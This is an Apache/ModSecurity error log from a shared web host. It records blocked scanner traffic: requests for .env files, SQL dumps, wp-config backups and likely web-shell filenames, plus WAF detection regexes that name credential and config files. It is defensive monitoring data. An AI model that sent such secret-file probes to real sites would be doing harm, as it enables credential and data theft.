[Tue May 26 19:53:25.311003 2026] [security2:error] [pid 86490:tid 86732] [client 74.249.173.207:38913] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/100.php"] [unique_id "ahWs3VZMwN0DpLVWo6KnLQAAAPU"]
[Tue May 26 19:53:25.475575 2026] [security2:error] [pid 86490:tid 86667] [client 74.249.173.207:4200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/fm.php"] [unique_id "ahWs3VZMwN0DpLVWo6KnMgAAALQ"]
[Tue May 26 19:53:25.475687 2026] [security2:error] [pid 86490:tid 86667] [client 74.249.173.207:4200] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/fm.php"] [unique_id "ahWs3VZMwN0DpLVWo6KnMgAAALQ"]
[Tue May 26 19:53:25.605593 2026] [security2:error] [pid 86490:tid 86706] [client 74.249.173.207:38938] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/z.ph"] [unique_id "ahWs3VZMwN0DpLVWo6KnOgAAANs"]
[Tue May 26 19:53:25.838428 2026] [security2:error] [pid 86490:tid 86650] [client 74.249.173.207:4182] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWs3VZMwN0DpLVWo6KnQAAAAKM"]
[Tue May 26 19:53:25.896796 2026] [security2:error] [pid 86490:tid 86621] [client 74.249.173.207:38938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xroot7.php"] [unique_id "ahWs3VZMwN0DpLVWo6KnRAAAAIY"]
[Tue May 26 19:53:25.896900 2026] [security2:error] [pid 86490:tid 86621] [client 74.249.173.207:38938] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xroot7.php"] [unique_id "ahWs3VZMwN0DpLVWo6KnRAAAAIY"]
[Tue May 26 19:53:25.921101 2026] [security2:error] [pid 86490:tid 86724] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs3VZMwN0DpLVWo6KnNgAAAO0"]
[Tue May 26 19:53:26.024557 2026] [security2:error] [pid 86490:tid 86697] [client 74.249.173.207:38920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/mini.php"] [unique_id "ahWs3lZMwN0DpLVWo6KnRgAAANI"]
[Tue May 26 19:53:26.024708 2026] [security2:error] [pid 86490:tid 86697] [client 74.249.173.207:38920] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/mini.php"] [unique_id "ahWs3lZMwN0DpLVWo6KnRgAAANI"]
[Tue May 26 19:53:26.298381 2026] [security2:error] [pid 86490:tid 86664] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/login.php~"] [unique_id "ahWs3lZMwN0DpLVWo6KnUQAAALE"]
[Tue May 26 19:53:26.459827 2026] [security2:error] [pid 86490:tid 86736] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/adminapp/.env"] [unique_id "ahWs3lZMwN0DpLVWo6KnWAAAAPk"]
[Tue May 26 19:53:26.785781 2026] [security2:error] [pid 86490:tid 86729] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/db.sql"] [unique_id "ahWs3lZMwN0DpLVWo6KnYQAAAPI"]
[Tue May 26 19:53:27.190912 2026] [security2:error] [pid 86490:tid 86606] [remote 196.188.249.61:36466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.249.188.196.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWs31ZMwN0DpLVWo6KnaQAAr3M"]
[Tue May 26 19:53:27.766810 2026] [security2:error] [pid 86490:tid 86740] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/oracle/.env"] [unique_id "ahWs31ZMwN0DpLVWo6KnigAAAP0"]
[Tue May 26 19:53:28.120017 2026] [security2:error] [pid 86490:tid 86737] [client 191.96.11.128:43648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.11.96.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "earthone.me"] [uri "/xmlrpc.php"] [unique_id "ahWs31ZMwN0DpLVWo6KniAAAAPo"]
[Tue May 26 19:53:28.258457 2026] [security2:error] [pid 86490:tid 86627] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cache/debug.log.bak"] [unique_id "ahWs4FZMwN0DpLVWo6KnnAAAAIw"]
[Tue May 26 19:53:28.291004 2026] [security2:error] [pid 86490:tid 86601] [remote 196.188.249.61:36466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.249.188.196.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWs4FZMwN0DpLVWo6KnmwAA5G4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:53:28.421059 2026] [security2:error] [pid 86490:tid 86636] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/backup/info.sql"] [unique_id "ahWs4FZMwN0DpLVWo6KnpAAAAJU"]
[Tue May 26 19:53:28.611187 2026] [security2:error] [pid 86490:tid 86691] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs4FZMwN0DpLVWo6KnmQAAAMw"]
[Tue May 26 19:53:29.236557 2026] [security2:error] [pid 86490:tid 86739] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/backup/wp-config.sql"] [unique_id "ahWs4VZMwN0DpLVWo6KnuQAAAPw"]
[Tue May 26 19:53:29.397926 2026] [security2:error] [pid 86490:tid 86674] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/symfony/.env"] [unique_id "ahWs4VZMwN0DpLVWo6KnvQAAALs"]
[Tue May 26 19:53:29.722915 2026] [security2:error] [pid 86490:tid 86681] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/newsletters/.env"] [unique_id "ahWs4VZMwN0DpLVWo6KnxgAAAMI"]
[Tue May 26 19:53:29.729186 2026] [security2:error] [pid 86490:tid 86612] [remote 64.22.104.200:37008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 200.104.22.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWs4VZMwN0DpLVWo6KnwQAAiHk"]
[Tue May 26 19:53:29.789520 2026] [security2:error] [pid 86490:tid 86605] [remote 47.128.47.118:25822] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/nos-programmes/acces-universel-aux-telecommunications-portabilite/"] [unique_id "ahWs4VZMwN0DpLVWo6KnywAA63I"]
[Tue May 26 19:53:30.047660 2026] [security2:error] [pid 86490:tid 86684] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/etc/.env"] [unique_id "ahWs4lZMwN0DpLVWo6Kn5AAAAMU"]
[Tue May 26 19:53:30.209195 2026] [security2:error] [pid 86490:tid 86725] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/events/.env"] [unique_id "ahWs4lZMwN0DpLVWo6Kn5gAAAO4"]
[Tue May 26 19:53:30.536338 2026] [security2:error] [pid 86490:tid 86674] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/celery.config.swp"] [unique_id "ahWs4lZMwN0DpLVWo6Kn8wAAALs"]
[Tue May 26 19:53:30.610777 2026] [security2:error] [pid 86490:tid 86596] [remote 74.91.224.220:38740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWs4lZMwN0DpLVWo6Kn6wAAkmk"]
[Tue May 26 19:53:30.697758 2026] [security2:error] [pid 86490:tid 86747] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/db.php.orig"] [unique_id "ahWs4lZMwN0DpLVWo6KoAAAAAQQ"]
[Tue May 26 19:53:30.727297 2026] [security2:error] [pid 86490:tid 86558] [remote 64.22.104.200:37008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 200.104.22.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWs4lZMwN0DpLVWo6Kn-QAA-UM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:53:30.859177 2026] [security2:error] [pid 86490:tid 86697] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/spring-app/api/.env"] [unique_id "ahWs4lZMwN0DpLVWo6KoBQAAANI"]
[Tue May 26 19:53:31.369692 2026] [security2:error] [pid 86490:tid 86642] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs4lZMwN0DpLVWo6KoCAAAAJs"]
[Tue May 26 19:53:31.511266 2026] [security2:error] [pid 86490:tid 86729] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/auth-app/api/.env"] [unique_id "ahWs41ZMwN0DpLVWo6KoLAAAAPI"]
[Tue May 26 19:53:31.673556 2026] [security2:error] [pid 86490:tid 86735] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/configuration~"] [unique_id "ahWs41ZMwN0DpLVWo6KoMwAAAPg"]
[Tue May 26 19:53:31.724899 2026] [security2:error] [pid 86490:tid 86557] [remote 165.22.95.96:60646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWs41ZMwN0DpLVWo6KoKwAAlkI"]
[Tue May 26 19:53:32.160756 2026] [security2:error] [pid 86490:tid 86686] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/purge/.env"] [unique_id "ahWs5FZMwN0DpLVWo6KoPwAAAMc"]
[Tue May 26 19:53:32.322827 2026] [security2:error] [pid 86490:tid 86698] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/keys/default.bak"] [unique_id "ahWs5FZMwN0DpLVWo6KoRgAAANM"]
[Tue May 26 19:53:32.717381 2026] [security2:error] [pid 86490:tid 86734] [client 66.132.195.97:29076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.195.132.66.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.quincaillerie.azurmediatec.com"] [uri "/viewimage.php"] [unique_id "ahWs5FZMwN0DpLVWo6KoUwAAAPc"]
[Tue May 26 19:53:33.592162 2026] [security2:error] [pid 86490:tid 86655] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs5VZMwN0DpLVWo6KoYwAAAKg"]
[Tue May 26 19:53:33.630235 2026] [security2:error] [pid 86490:tid 86677] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/tmp/wp-config.bak"] [unique_id "ahWs5VZMwN0DpLVWo6KobAAAAL4"]
[Tue May 26 19:53:33.955945 2026] [security2:error] [pid 86490:tid 86710] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/php/info.bak"] [unique_id "ahWs5VZMwN0DpLVWo6KoegAAAN8"]
[Tue May 26 19:53:34.610405 2026] [security2:error] [pid 86490:tid 86732] [client 104.28.84.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWs5lZMwN0DpLVWo6KolAAAAPU"]
[Tue May 26 19:53:35.268417 2026] [security2:error] [pid 86490:tid 86674] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/*.env.tmp.backup"] [unique_id "ahWs51ZMwN0DpLVWo6KoqQAAALs"]
[Tue May 26 19:53:35.594540 2026] [security2:error] [pid 86490:tid 86636] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/library/.env"] [unique_id "ahWs51ZMwN0DpLVWo6KotQAAAJU"]
[Tue May 26 19:53:35.817734 2026] [security2:error] [pid 86490:tid 86714] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs51ZMwN0DpLVWo6KosAAAAOM"]
[Tue May 26 19:53:35.919364 2026] [security2:error] [pid 86490:tid 86634] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/test/.env"] [unique_id "ahWs51ZMwN0DpLVWo6KowAAAAJM"]
[Tue May 26 19:53:36.068268 2026] [autoindex:error] [pid 86490:tid 86721] [client 45.148.10.120:0] AH01276: Cannot serve directory /home1/moesartc/public_html/unsobered.com/staging/.git/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:53:36.080503 2026] [security2:error] [pid 86490:tid 86620] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/repo/.env"] [unique_id "ahWs6FZMwN0DpLVWo6KozAAAAIU"]
[Tue May 26 19:53:36.242768 2026] [security2:error] [pid 86490:tid 86675] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/facebook.php.bak"] [unique_id "ahWs6FZMwN0DpLVWo6KozgAAALw"]
